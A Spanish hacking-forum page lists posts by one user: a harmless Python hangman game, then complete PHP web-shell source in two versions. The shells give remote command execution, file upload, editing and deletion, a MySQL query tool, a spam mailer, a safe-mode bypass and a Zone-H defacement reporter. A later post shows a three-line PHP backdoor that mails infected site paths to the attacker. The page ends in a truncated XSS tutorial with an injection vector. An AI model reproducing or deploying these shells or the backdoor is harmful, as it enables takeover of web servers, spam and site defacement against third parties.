Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Okol

#1
Python / Jugando ahorcado con Python
Febrero 21, 2013, 05:12:36 PM
Hola amigos, hace unos días junto con un amigo nos pusimos a programar un juego de ahorcado.
espero lo disfruten, son dos archivos.


Sources:

archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: python
mono = [
'''
   +------------+
   |            |
   |
   |
   |
   |
   |
   |
   |
   |
   |
   |
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |
   |
   |
   |
   |
   |
   |
   |
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |            |
   |            |
   |            |
   |            |
   |            |
   |
   |
   |
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |            |
   |           /|
   |          / |
   |         /  |
   |            |
   |
   |
   |
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |            |
   |           /|\\
   |          / | \\
   |         /  |  \\
   |            |
   |
   |
   |
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |            |
   |           /|\\
   |          / | \\
   |         /  |  \\
   |            |
   |           /
   |          /
   |         /
   +------------------+
   |//////////////////|
''',
'''
   +------------+
   |            |
   |           / \\
   |           \\ /
   |            |
   |           /|\\
   |          / | \\
   |         /  |  \\
   |            |
   |           / \\
   |          /   \\
   |         /     \\
   +------------------+
   |//////////////////|
'''
]

if __name__ == '__main__':
    for i in range(len(mono)):
        print mono[i]



Archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: python
#Okol & Developingo
import mono
from random import choice

lista_palabras = {
    'cpu': 'Unidad central de procesamiento',
    'sqli':'Es un error que te permite ejecutar consultas a la base de datos',
    'php':'lenguaje de programacion para crear webs dinamicas',
    'ruby on rails':'framework web de ruby',
    'perl':'papa de PHP',
    'django':'framework web de python',
    'print':'funcion para imprimir en pantalla en casi cualquier lenguaje de scripting'
   
}

print """
Vamos a jugar ahorcado!!
Listo?

"""
raw_input('Enter para comenzar!')

palabra = choice(lista_palabras.keys())
intentos_lista = ['_']*len(palabra)
intentos_malos = 0
primer_juego = True

while True:
    s = ''
    for i in intentos_lista:
        s += i+','
    print s[:-1] #Imprimir la lista con la palabra del usuario
    print mono.mono[intentos_malos]
    if primer_juego:
print lista_palabras[palabra]
primer_juego = False
    intento = raw_input('Intenta: ')
    if intento == palabra:
        print "Felicidades!! ganaste!!"
        print 'La palabra es', palabra
        break
    elif intento in palabra and len(intento)==1:
        for i in range(len(palabra)): #Reemplazar las letras
            if palabra[i] == intento:
                intentos_lista[i] = intento
        #Comprobar que no haya ganado
        for i in intentos_lista:
            if i == '_':
                break
        else:
            print "Felicidades!! ganaste!!"
            print 'La palabra es', palabra
            break
           
    else:
        intentos_malos += 1
        if intentos_malos == 6:
            print "PERDISTE!!"
            print mono.mono[6]
            break
        print 'Ups te quedan', 6-intentos_malos, 'intentos'

print "FIN"
#2
Shells / OkolShell v2
Enero 27, 2013, 12:59:31 AM
Hola amigos, ahora les vengo anunciando la V2 de la OkolShell, Dispone de nuevas mejoras.
¿Cuales son?

-Bug Fixes.
-Adición de un panel de administración.
-Navegación de directorios.
-Un Diseño más amigable y ordenado.

Decidí quitar el safe mode bypass ya que la mayoría sabe bypassearlo.

Cualquier asunto por MP.

Les dejo unas fotos:




*La contraseña por defecto es: pass.

Source:

Código: php

<?php
session_start();
?>
<style type="text/css">
table {
  border-collapse: collapse;
  border: 1px solid #03476F;
  font: normal 11px verdana, arial, helvetica, sans-serif;
  color: #363636;
  background: #92C428;
  }
caption {
  text-align: center;
  font: bold 18px arial, helvetica, sans-serif;
  background: transparent;
  padding:6px 4px 8px 0px;
  color: #03476F;
  text-transform: uppercase;
  }
td, th {
  border: 1px dotted #03476F;
  padding: .4em;
  color: #363636;
  }

thead th, tfoot th {
  font: bold 11px verdana, arial, helvetica, sans-serif;
  border: 1px solid #03476F;;
  text-align: left;
  background: #4591AD;
  color: #FFFFFF;
  padding-top:3px;
  }
tbody td a {
  background: transparent;
  text-decoration: none;
  color: #363636;
  }
tbody td a:hover {
  background: #C2F64D;
  color: #363636;
  }
tbody th a {
  font: normal 11px verdana, arial, helvetica, sans-serif;
  background: transparent;
  text-decoration: none;
  font-weight:normal;
  color: #363636;
  }
tbody th a:hover {
  background: transparent;
  color: #363636;
  }
tbody th, tbody td {
  vertical-align: top;
  text-align: left;
  }
tfoot td {
  border: 1px solid #03476F;
  background: #4591AD;
  padding-top:3px;
  color: #FFFFFF;
  }
.odd {
  background: #AEE239;
  }
tbody tr:hover {
  background: #FFD800;
  border: 1px solid #03476F;
  color: #FFFFFF;
  }
tbody tr:hover th,
tbody tr.odd:hover th {
  background: #FFD800;
  color: #FFFFFF;
  }
  input, textarea { background-color: #000; color: #0F0; padding: 5px; font-size: 15px; }
     
</style>
<body bgcolor="Black" Text="green" alink="green" blink="green" link="green">
            <title>OkolShell v2</title>
            <center><pre style="color: green; text-shadow: 0px 0px 8px yellow;">

<big>
________   __         .__    _________.__           .__  .__          ________ 
\_____  \ |  | ______ |  |  /   _____/|  |__   ____ |  | |  |   ___  _\_____  \
/   |   \|  |/ /  _ \|  |  \_____  \ |  |  \_/ __ \|  | |  |   \  \/ //  ____/
/    |    \    <  <_> )  |__/        \|   Y  \  ___/|  |_|  |__  \   //       \
\_______  /__|_ \____/|____/_______  /|___|  /\___  >____/____/   \_/ \_______ \
        \/     \/                  \/      \/     \/                          \/
<?php echo "<font size='2'>".shell_exec('uname -a');
echo '<font size="2" color="red">usuario </font><font size="2">'. shell_exec('id');
echo '<font size="2" color="red">PHP Version </font><font size="2">'. phpversion().'<br>';
echo '<font size="2" color="red">Safe Mode </font><font size="2" color="gray">'. $safe_mode = @ini_get("safe_mode")?'<font color="red">ON</font>':'<font color="green">OFF</font>'; $safe_mode;
echo '</pre><tr></tr>';
?>
    </pre></center><br /><br /></big></span>
    <center>
<?php
@set_magic_quotes_runtime(0);
if(@$_SESSION['okol'] != 'logged'){
    if(isset($_POST['asdd']) && $_POST['asd'] == 'pass'){
        $_SESSION['okol'] = 'logged';
        echo '<script>window.location="?";</script>';
    }
?>

<form action="" method="POST">
  <input type="pass" name="asd"  />
  <input type="submit" name="asdd" value="Logear" style="color: green; text-shadow: 0px 0px 8px yellow;"/>
</form>

<?php
die();
}
$sec = @$_GET['sec'];
if($sec == 'mail'){

?>

   
<h3>Mailer</h3>
    <form method="post" action="">
        Desde:<input type="text"name="from"><br /><br />
        Asunto<input type="text"name="asunto"><br /><br />
        Numero De Mensajes<input type="text"name="num"><br /><br />
        Para:<textarea name="para"></textarea><br>
        [*]Si son varios mails separalos por coma...<br><br />
        Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
        <center><input type="submit" value="Spam!" name="spam"><br /></center>
    </form>
<?php
if(isset($_POST['spam'])){
$desde = $_POST['from'];
$para= $_POST['para'];
$cont= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
    $lol=$lol + 1;
mail($para,$asunto,$cont,'From:'.$desde);
                    }
if(mail($para,$asunto,$cont,'From:'.$desde))
{
    echo'<>Enviado Correctamente!<br>';

}else{
    echo '<center>No se pudo enviar el mensaje<br>';
}
}

}elseif ($sec == 'reportzone') {
 
?>
<h3>Zone-H Reporter</h3>
    <form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
    url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
    nick: <br><input type="text" name="nick"><br>
   
    <input type="submit" value="Reportar">
    </form>
<?php
if(isset($_POST['report']))
    {
    @$defacer = htmlentities($_POST['nick']);
    @$url = htmlentities($_POST['report']);
    @$url2 = htmlentities($_POST['report1']);
    @$url3 = htmlentities($_POST['report2']);
    @$url4 = htmlentities($_POST['report3']);
    @$url5 = htmlentities($_POST['report4']);
    @$url6 = htmlentities($_POST['report5']);
    @$url7 = htmlentities($_POST['report6']);
    @$url8 = htmlentities($_POST['report7']);
    @$url9 = htmlentities($_POST['report8']);
    @$url10 = htmlentities($_POST['report9']);
    function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
    { 
     
    $ch = curl_init("http://zone-h.com/notify/mass");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
    curl_exec($ch);
    curl_close($ch);
    }
     
    ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
     
    }
}elseif ($sec == 'ejec') {
   ?>
   <form method="POST" action="">
    <h3>Comando a ejecutar</h3><br />
    <input type="text"  name="ejec"><br />
    <input type="submit" value="Ejecutar"><br />
</form>

   <?php
   echo '<textarea cols="70" rows="10">';
    echo @shell_exec($_POST['ejec']);
    echo '</textarea>';
}elseif ($sec == 'crypt') {
  ?>
<h3>Cifrar y Descifrar</h3>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
     Ingrese texto a Desencriptar:<br>
     <input type="text" name="decript64"><br>
     <input type="submit" value="Desencriptar">
     </form>

<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
     Ingrese texto a encriptar:<br>
     <input type="text" name="encript64"><br>
     <input type="submit" value="Encriptar"><br /><br />
     </form>

     <form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
        Encriptar en MD5<br />
        <input type="text" name="md5en">
        <input type="submit" value="encriptar"><br>
    </form>

     <?php

     #encript b64
function base64en(){
     $encript = base64_encode($_POST['encript64']);
     echo $encript.'<br>';
}

#Decript b64
function base64de(){
    $decript = base64_decode($_POST['decript64']);
    echo $decript.'<br>';
}

#encript Md5
function md5encript(){
    $encriptmd5 = md5($_POST['md5en']);
    echo $encriptmd5.'<br>';
}

if(isset($_POST['encript64'])){
    base64en();
}
if(isset($_POST['decript64'])){
    base64de();
}
if(isset($_POST['md5en'])){
    md5encript();
}
}elseif ($sec == 'mysqlsen') {
  ?>
<form method="POST" action="">
    <h3>Sentencias Mysql</h3><br>
    Host:<input type="text" name="host">
    User:<input type="text" name="user">
    Password:<input type="text" name="password"><br>
    DB:<input type="text" name="database">
    Query: <input type="text" name="query">
    <input type="submit" value="Ejecutar" name="mysqlsentencia">
</form>
  <?php

  if(isset($_POST['query'])){
    $host = $_POST['host'];
    $user = $_POST['user'];
    $pass = $_POST['password'];
    $query = $_POST['query'];
    $db = $_POST['database'];
    $con = mysql_connect($host, $user, $pass);
    echo mysql_error()?"Error: " . mysql_error():"Conectado con exito\n";
                mysql_select_db($db, $con);
                    echo mysql_error()?"Error: " . mysql_error():"DB seleccionada con exito\n\n";
                $resultado = mysql_query($query);
if($result)
                {
                    while($line = mysql_fetch_array($result,MYSQL_ASSOC))
                    {
                        print_r ($line);
                    }
                }
              }
               
           
}



?>

<a href="?sec=mail">Mailer</a><br>
<a href="?sec=reportzone">Zone-H Reporter</a><br>
<a href="?sec=ejec">Ejecutar comandos</a><br>
<a href="?sec=crypt">Zone Crypter (Md5 y Base64)</a><br>
<a href="?sec=mysqlsen">Mysql Sentences</a><br>
<form action="" method="post" enctype="multipart/form-data">
 
    <h3 style="color: green; text-shadow: 0px 0px 2px green;">Enviar un nuevo archivo: </h3>
    <br>
    <input name="banner" type="file">
    <br>
    <input type="submit" value="Enviar" name="subir">
    </form>

    <?php
    if(isset($_GET['del']) & @$_GET['file'] != ""){
      unlink($_GET['file']);
      echo '<script>window.location="?";</script>';
    }
    if(isset($_POST['subir'])){

$path= $_GET['dir'];

$nombreArch=$_FILES['banner']['name'];

if (is_uploaded_file($_FILES['banner']['tmp_name']))
{
   move_uploaded_file($_FILES['banner']['tmp_name'], $path."/".$nombreArch);
  echo "El archivo se ha subido correctamente al servidor, muchas gracias <p>";
}
else {
  echo "Error al subir el archivo ";
  echo $path."/".$archivo."";
}

}
if($sec = 'menu'){

@$file = htmlentities($_GET['file']);
@$sec = $_GET['sec'];

}
$directorio = isset($_GET['dir'])?$_GET['dir']:"/";
function permisos($permiso){
        //Sacado de php.net :)

        $permisos = @fileperms($permiso);
        if (($permisos & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($permisos & 0xA000) == 0xA000) {
    // Enlace Simbólico
    $info = 'l';
} elseif (($permisos & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($permisos & 0x6000) == 0x6000) {
    // Especial Bloque
    $info = 'b';
} elseif (($permisos & 0x4000) == 0x4000) {
    // Directorio
    $info = 'd';
} elseif (($permisos & 0x2000) == 0x2000) {
    // Especial Carácter
    $info = 'c';
} elseif (($permisos & 0x1000) == 0x1000) {
    // Tubería FIFO
    $info = 'p';
} else {
    // Desconocido
    $info = 'u';
}

// Propietario
$info .= (($permisos & 0x0100) ? 'r' : '-');
$info .= (($permisos & 0x0080) ? 'w' : '-');
$info .= (($permisos & 0x0040) ?
            (($permisos & 0x0800) ? 's' : 'x' ) :
            (($permisos & 0x0800) ? 'S' : '-'));

// Grupo
$info .= (($permisos & 0x0020) ? 'r' : '-');
$info .= (($permisos & 0x0010) ? 'w' : '-');
$info .= (($permisos & 0x0008) ?
            (($permisos & 0x0400) ? 's' : 'x' ) :
            (($permisos & 0x0400) ? 'S' : '-'));

// Mundo
$info .= (($permisos & 0x0004) ? 'r' : '-');
$info .= (($permisos & 0x0002) ? 'w' : '-');
$info .= (($permisos & 0x0001) ?
            (($permisos & 0x0200) ? 't' : 'x' ) :
            (($permisos & 0x0200) ? 'T' : '-'));

return $info;
    }
        if($file == ""){
         echo '<table border="1"> <tr> <th ><font color="gray">archivos</font></th>';
        echo '<th><font color="gray">Tama&ntilde;o</th></font>';
        echo '<th><font color="gray">Tipo</th></font>';
        echo '<th><font color="gray">Permisos</th></tr></font>';
            $files = @scandir($directorio) or die('No existe el directorio que buscas');
            for ($i=0; $i < count($files); $i++) {
                if($files[$i] != "." && $files[$i] != ".."){
                    $cat = is_file($directorio."/".$files[$i])?"file":"dir";
                    chdir($directorio);
                    echo "<tr><td><a href='?".$cat."=" .$directorio."/".$files[$i]."''>".$files[$i]."</a></td>";
                    echo '<td>'. @filesize($files[$i]).' KB</td>';
                    echo '<td>'. @filetype($files[$i]).'</td>';
                    echo '<td>'. permisos($files[$i]).'</td>';
                    echo "<td><a href='?del&file=$directorio/$files[$i]'>Eliminar</a></td></tr>";
                   
                   
                }
            }
        echo '</table>';
        echo '<form method="GET" action=""> ';
        echo '<input type="text" name="dir" value="'.$_SERVER['DOCUMENT_ROOT'].'"> ';
        echo '<input type="Submit" value="navegar"> ';
        echo '<td>';






        if(isset($_GET['dela']) && $_GET['dela'] != ''){
            chdir($directorio);
            unlink($archel);
        }


        }else{
         
            if(isset($_POST['enviar'])){
                $fp=fopen("$file", "w+");
                fputs($fp, $_POST['contenido']);
                @fclose($fp);
                echo 'Editado';
            }
            if(is_file($file))
            {
            $fp = @fopen("$file", 'r');
            $cont = @fread($fp, filesize($file))or die('No se puede editar.');
            $cont = $cont;
            @fclose($fp);
           
           
            echo "<form action='' method='POST'> ";
            echo "<textarea name='contenido' cols= '60' rows='20'>".htmlentities($cont)."</textarea><br> ";
            echo "<input type='submit' value='Editar' name='enviar'><br> ";
            echo "</form>";
            echo '<button onClick="history.go(-1)">Atras</button>';
          }
        }



   

    ?>

    </form>
<h3 color="green">Crear archivo:</h3><br><br>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    Nombre del archivo<br />
    <input type="text" name="archivo"><br /><br>
    Codigo<br />
    <textarea name="contenido2" cols="60" rows="15"></textarea><br />
   
    <input type="submit" value="crear" name="Mod"><br />
</form>

<?php

if(isset($_POST['archivo'])){
    $contenido = $_POST['contenido2'];
    $nombre = $_POST['archivo'];
    $crear = @fopen($nombre,'w+');
    @fwrite($crear, $contenido);
    @fclose($crear);
    echo 'El archivo se ha creado correctamente.';
}


?>

</center>


Saludos.
Special Greetz: artshu | Kid_Goth.
#3
Shells / Okol BasicShell v1
Enero 16, 2013, 05:09:29 PM
Hola amigos, espero se encuentren bien.
he estado trabajando en esté proyecto alrededor de tres días, es una shell (Basica).
espero la disfruten y pues cualquier cosa pueden decirla.

Funciones:

-Subir archivos
-Eliminar, crear y modificar archivos.
-Ejecución de comandos en el sistema.
-Bypass Safemode
-Listado de archivos en el directorio.
-Mysql query's
-Encriptar y desencriptar en base64
-Encriptar en MD5
-Zone-h Reporter
-Mailer.

*El servidor no debe tener desactivada la función system()

Espero les pueda servir para algo.
Saludos comunidad.

Source:
Código: php
<title>BasicShell</title>
<h1>BasicShell Okol</h1>
<font size="2" color="red">Uname</font><font size="2" color="gray"> <?php system('uname -a'); ?></font><br />
<font size="2" color="red">usuario</font><font size="2" color="gray"> <?php system('id'); ?></font><br />
<font size="2" color="red">PHP Version</font><font size="2" color="gray"> <?php echo phpversion();?></font><br />
<font size="2" color="red">Tu IP</font><font size="2" color="gray"> <?php ECHO $_SERVER['REMOTE_ADDR']; ?></font><br />
<font size="2" color="red">Safe Mode</font><font size="2" color="gray"> <?php $safe_mode = @ini_get('safe_mode')?'<font color="red">ON</font>':'<font color="green">OFF</font>'; echo $safe_mode; ?></font><br /><br />
<font size="2">
<style type="text/css">
input[type='text'] { color: red; width:100px;height:20px;background-color:gray;color:yellow;font-size:10pt; font-family:Verdana;text-align:center}
</style>
<style type="text/css">
textarea{ color: red;width:350px;height:150px;font-size:12px;font-family:Helvetica;background-color:gray;color:yellow;}
</style>
<style type="text/css">
input[type='submit'] { color: red; width:100px;height:20px;background-color:red;color:yellow;font-size:7pt; font-family:Verdana;text-align:center}

</style>
<style type="text/css">
            body { background-color: #000; color: #F80; text-align: center;size:12px; }
            img { width: 18px; height: 18px; }
           
            a { color: #000; text-decoration: none; font-family:Helvetica; size: 9px; }
            td { padding-left: 20px; text-align: justify; }
        </style>
<form action="<?php basename($_SERVER['PHP_SELF']);  ?>" method="post" enctype="multipart/form-data">
 
    <h3>Enviar un nuevo archivo: </h3>
    <br>
    <input name="userfile" type="file">
    <br>
    <input type="submit" value="Enviar" name="subir">
    </form>
<h3>eliminar archivo<br />

<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    <input type="text" name="archivoaeliminar">
    <input type="submit" value="Eliminar">

<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    <h3>Comando a ejecutar</h3><br />
    <input type="text"  name="ejec"><br />
    <input type="submit" value="Ejecutar"><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    <h3>Bypass Safemode</h3><br>
    <input type="submit" name="safemode" value="Bypass safemode">

</form>
<?php
echo '<h3>Los archivos en el directorio son:</h3><br>';
#Listado de archivos
if ($gestor = opendir('.')) {
    while (false !== ($entrada = readdir($gestor))) {
        if ($entrada != "." && $entrada != "..") {
            echo '<pre>';
            echo "$entrada\n";
            echo '</pre>';
        }
    }
    closedir($gestor);
}
?>
<h3>Modificar un archivo existente:</h3>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    Nombre de archivo a modificar:<br>
    <input type="text" name="archmod" value="index.php" >
    <input type="submit" name="modificar" value="Abrir archivo"><br><br>
    Codigo<br>
    <textarea name="contenido" cols="80" rows="15">
         <?php
        if(isset($_POST['archmod']) && $_POST['archmod'] != "")
        {
            echo abrirarchivo($_POST['archmod']);
        }
        ?>
    </textarea><br />
    <input type="submit" name="modificar" value="Guardar cambios"><br>
</form>
<h3>Crear archivo:</h3><br><br>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    Nombre del archivo<br />
    <input type="text" name="archivo"><br /><br>
    Codigo<br />
    <textarea name="contenido2" cols="60" rows="15"></textarea><br />
    <input type="submit" value="crear" name="Mod"><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']);  ?>">
    <h3>Sentencias Mysql</h3><br>
    Host:<input type="text" name="host">
    User:<input type="text" name="user">
    Password:<input type="text" name="password"><br>
    DB:<input type="text" name="database">
    Query: <input type="text" name="query">
    <input type="submit" value="Ejecutar" name="mysqlsentencia">
</form>
<h3>Cifrar y Descifrar</h3>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
     Ingrese texto a Desencriptar:<br>
     <input type="text" name="decript64"><br>
     <input type="submit" value="Desencriptar">
     </form>

<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
     Ingrese texto a encriptar:<br>
     <input type="text" name="encript64"><br>
     <input type="submit" value="Encriptar"><br /><br />
     </form>

     <form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
        Encriptar en MD5<br />
        <input type="text" name="md5en">
        <input type="submit" value="encriptar"><br>
    </form>
<h3>Zone-H Reporter</h3>
    <form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
    url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
    nick: <br><input type="text" name="nick"><br>
   
    <input type="submit" value="Reportar">
    </form></center>
<h3>Mailer</h3>
    <form method="post" action="<?php basename($_SERVER['PHP_SELF']) ?>">
        Desde:<input type="text"name="from"><br /><br />
        Asunto<input type="text"name="asunto"><br /><br />
        Numero De Mensajes<input type="text"name="num"><br /><br />
        Para:<textarea name="para"></textarea><br>
        [*]Si son varios mails separalos por coma...<br><br />
        Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
        <center><input type="submit" value="Spam!" name="spam"><br /></center>
    </form>
<?php
@set_magic_quotes_runtime(0);
#Ejecutar comando
function ejecutaros(){
    echo '<textarea cols="70" rows="10">';
    $ejec = @system($_POST['ejec']);
    echo '</textarea>';
}
#crear archivo
function crear(){
    $contenido = $_POST['contenido2'];
    $nombre = $_POST['archivo'];
    $crear = @fopen($nombre,'w+');
    @fwrite($crear, $contenido);
    @fclose($crear);
    echo 'El archivo se ha creado correctamente.';
}
#Bypass safe mode
function bysafemode(){
    $sacrear = fopen("php.ini",'w+');
    fwrite($sacrear, 'safe_mode = Off ');
    fclose($sacrear);
    system('chmod 777 php.ini');
}
#Subir archivo
function subir(){
$allowed_ext = "rar,jpg,php,png,txt,html,zip,pl,py,mp3,c"; 
$overwrite = "no";
$match = "";
$filesize = $_FILES['userfile']['size'];
$filename = strtolower($_FILES['userfile']['name']);

if($filesize < 1){
   @$error .= "- Archivo vacío.<br>";
}
$file_ext = preg_split("/\./",$filename);
$allowed_ext = preg_split("/\,/",$allowed_ext);
foreach($allowed_ext as $ext){
   if($ext==$file_ext[1]) $match = "1";
}
if(@$error){
   print "Se ha producido el siguiente error al subir el archivo:<br> $error";
}else{
   if(move_uploaded_file($_FILES['userfile']['tmp_name'], $filename)){
      print "<b>$filename</b> se ha subido correctamente!";
   }
}
}
#Mysql Query
function mysqlsen(){
    $host = $_POST['host'];
    $user = $_POST['user'];
    $pass = $_POST['password'];
    $query = $_POST['query'];
    $db = $_POST['database'];
    $con = mysql_connect($host, $user, $pass);
    echo mysql_error()?"Error: " . mysql_error():"Conectado con exito\n";
                mysql_select_db($db, $con);
                    echo mysql_error()?"Error: " . mysql_error():"DB seleccionada con exito\n\n";
                $resultado = mysql_query($query);
if($result)
                {
                    while($line = mysql_fetch_array($result,MYSQL_ASSOC))
                    {
                        print_r ($line);
                    }
                }
                //while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); 
                //mysql_free_result($result);
                //die;
            }

function abrirarchivo($arc)
{
     $archivo = @file_get_contents($arc);
     $archivo = ucfirst($archivo);
     return htmlentities(@$archivo);
}
#encript b64
function base64en(){
     $encript = base64_encode($_POST['encript64']);
     echo $encript;
}

#Decript b64
function base64de(){
    $decript = base64_decode($_POST['decript64']);
    echo $decript;
}

#encript Md5
function md5encript(){
    $encriptmd5 = md5($_POST['md5en']);
    echo $encriptmd5;
}

#Eliminar archivos
function eliminararch(){
$eliminar = $_POST['archivoaeliminar'];
@unlink($eliminar);
}

if(isset($_POST['contenido2'])){
    crear();
}
if(isset($_POST['ejec'])){
    ejecutaros();
}
if(isset($_POST['safemode'])){
    bysafemode();
}
if(isset($_POST['subir'])){
    subir();
}
if(isset($_POST['mysqlsentencia'])){
    mysqlsen();
}
if(isset($_POST['encript64'])){
    base64en();
}
if(isset($_POST['decript64'])){
    base64de();
}
if(isset($_POST['md5en'])){
    md5encript();
}
if(isset($_POST['archivoaeliminar'])){
    eliminararch();
}
     
   
    if(isset($_POST['report']))
    {
    @$defacer = htmlentities($_POST['nick']);
    @$url = htmlentities($_POST['report']);
    @$url2 = htmlentities($_POST['report1']);
    @$url3 = htmlentities($_POST['report2']);
    @$url4 = htmlentities($_POST['report3']);
    @$url5 = htmlentities($_POST['report4']);
    @$url6 = htmlentities($_POST['report5']);
    @$url7 = htmlentities($_POST['report6']);
    @$url8 = htmlentities($_POST['report7']);
    @$url9 = htmlentities($_POST['report8']);
    @$url10 = htmlentities($_POST['report9']);
    function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
    { 
     
    $ch = curl_init("http://zone-h.com/notify/mass");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
    curl_exec($ch);
    curl_close($ch);
    }
     
    ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
     
    }
     if(isset($_POST['spam'])){
$desde = $_POST['from'];
$para= $_POST['para'];
$cont= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
    $lol=$lol + 1;
mail($para,$asunto,$cont,'From:'.$desde);
                    }
if(mail($para,$asunto,$cont,'From:'.$desde))
{
    echo'<>Enviado Correctamente!<br>';

}else{
    echo '<center>No se pudo enviar el mensaje<br>';
}
}

?>
<font size="2" color="gray">By Okol twitter: @Okoltutos | HackxCrack | Underc0de | StrikeGeek | Greetz: all my friends</font>
#4
Bugs y Exploits / Backdorizando un archivo PHP
Enero 14, 2013, 08:54:02 PM
Hola, esperando tengan una buena noche.
Hoy explicaré como backdorizar un archivo .PHP o puede ser .html
Bueno son 3 lineas las cuales nos serán de gran utilidad.
usaremos la variable global $_SERVER y la funcion mail()

Código: php

<?php
$domain = $_SERVER['SERVER_NAME'];//El dominio en el cual está nuestro archivo
$ruta = $_SERVER['PHP_SELF'];//la ruta de el archivo
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);//Manda un mail con la ruta
?>



¿Ideas?
Esto podría servir poniéndolo en algún mailer ó alguna shell y cuando el usuario entre a la shell o el mailer nos mandará un email con la ruta.

(Modificar mi email por el suyo en el primer parámetro de la función mail() ).


PD: No me hago responsable de el uso de esto. Estoy en contra de esas practicas pero... Hay que compartir y espero a más de uno le sirva.

Saludos!
#5
Bugs y Exploits / XSS y reparacion
Enero 03, 2013, 06:05:45 PM
¿Qué es XSS?
Xss es una vulnerabilidad que permite inyectar un código html o javascript en algún formulario ya sea por GET o por POST (por GET es más peligroso).

¿Consecuencias?
Podrian hacer desde una simple alerta hasta robar la cookie de el administrador.

NOTA: para poder entender muy bien esta vulnerabilidad deberíamos saber sobre html ó javascript.

Enviar datos por GET:
Para enviar datos por el método GET es muy fácil, solo debemos poner en la variable nuestro "vector" (un vector es como decir el "Código" con el que saltará nuestra alerta o cualquier otra cosa que hagamos.
Ejemplo:
pagina.com/archivo.php?variable="><script>alert("Okol")</script>
Ya que con el método GET se muestra lo que envias en la url es más "fácil" inyectar nuestro vector.

Enviar datos por POST:
Para enviar datos con el método POST es necesario capturar lo que estamos enviando, para eso yo uso un complemento de firefox llamado Live Http Headers. Básicamente eso registra TODO lo que envías.
Lo instalamos en Complementos -> Buscamos Live http Headers.
Bien. Una vez que lo tenemos, lo abrimos y abrimos una página cualquiera y miren.

Ahora, si nosotros llenamos algun formulario por POST se mostrará así como vemos a continuación:

Salen muchas variables pero la que nos interesa es la POST, bien ahora daremos click a donde dice POST y daremos en repetir, veras que tenemos color=red ó cualquier otro color y quedaría así:

